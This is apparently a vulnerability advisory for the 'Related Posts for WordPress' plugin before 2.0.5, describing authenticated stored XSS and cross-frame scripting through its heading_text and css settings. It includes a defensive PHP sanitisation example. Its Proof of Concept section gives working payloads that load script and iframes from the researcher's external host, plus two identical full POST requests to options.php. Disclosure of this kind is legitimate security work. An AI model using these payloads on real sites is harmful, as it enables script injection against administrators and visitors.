WordPress Plugin Vulnerabilities

Related Posts for WordPress < 2.0.5 - Authenticated Stored XSS & XFS

Description

The plugin does not sanitise its heading_text and css settings, allowing high-privilege users (such as an admin) to store XSS payloads in them, leading to Stored Cross-Site Scripting issues.
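As an added example (not the plugin's own code; the function names are hypothetical, the option name rp4wp and the field names follow the advisory), the kind of sanitize callback on save plus context-aware escaping on output that closes this class of settings-page XSS in WordPress:

```php
<?php
// Added example, not code from the plugin. Function names are hypothetical;
// option and field names (rp4wp, heading_text, css, ...) follow the advisory.

// Sanitise the whole settings array before it reaches wp_options. Registered as
// the sanitize_callback, so it runs on every options.php save for this group.
function rp4wp_example_sanitize_settings( $input ) {
    $clean = array();

    // Plain-text heading: sanitize_text_field() strips tags, octets and
    // line breaks, so '"><script src=...>' cannot survive the save.
    $clean['heading_text'] = isset( $input['heading_text'] )
        ? sanitize_text_field( $input['heading_text'] )
        : '';

    // Custom CSS: no HTML is legitimate here. wp_strip_all_tags() removes
    // <script>/<style> blocks with their contents and every other tag, which
    // also neutralises the </textarea><iframe ...> breakout.
    $clean['css'] = isset( $input['css'] )
        ? wp_strip_all_tags( $input['css'] )
        : '';

    // Numeric and boolean options: coerce so they cannot carry markup.
    $clean['automatic_linking']             = empty( $input['automatic_linking'] ) ? 0 : 1;
    $clean['automatic_linking_post_amount'] = absint( $input['automatic_linking_post_amount'] ?? 0 );
    $clean['excerpt_length']                = absint( $input['excerpt_length'] ?? 0 );
    $clean['display_image']                 = empty( $input['display_image'] ) ? 0 : 1;

    return $clean;
}

add_action( 'admin_init', function () {
    register_setting( 'rp4wp', 'rp4wp', array(
        'type'              => 'array',
        'sanitize_callback' => 'rp4wp_example_sanitize_settings',
    ) );
} );

// Escape on output as well: sanitising on save is defence in depth, not a
// substitute for escaping in the context where the value is rendered.
function rp4wp_example_render_settings_form( $options ) {
    // Attribute context: esc_attr() encodes the quote that closes the value.
    printf( '<input type="text" name="rp4wp[heading_text]" value="%s">',
        esc_attr( $options['heading_text'] ?? '' ) );
    // Textarea context: esc_textarea() encodes '<' so </textarea> cannot close it.
    printf( '<textarea name="rp4wp[css]">%s</textarea>',
        esc_textarea( $options['css'] ?? '' ) );
}
```

The same escaping applies wherever the plugin prints heading_text on the front end (esc_html) and emits css inside a style element; sanitising on save alone would still leave older stored values exposed.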

Proof of Concept

Payloads:

[$] m0ze"><script src=//m0ze.ru/payload/a.js></script><div x

[$] m0ze</textarea><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x

PoC #1 | Authenticated Persistent XSS & XFS | Heading text:

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x


PoC #2 | Authenticated Persistent XSS & XFS | CSS:

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x

Affects Plugins

Related Posts for WordPress, fixed in 2.0.5

Classification

Type
XSS

Miscellaneous

Original Researcher
m0ze
Submitter
m0ze
Verified
Yes

Timeline

Publicly Published
2021-05-17
Added
2021-06-25
Last Updated
2022-01-02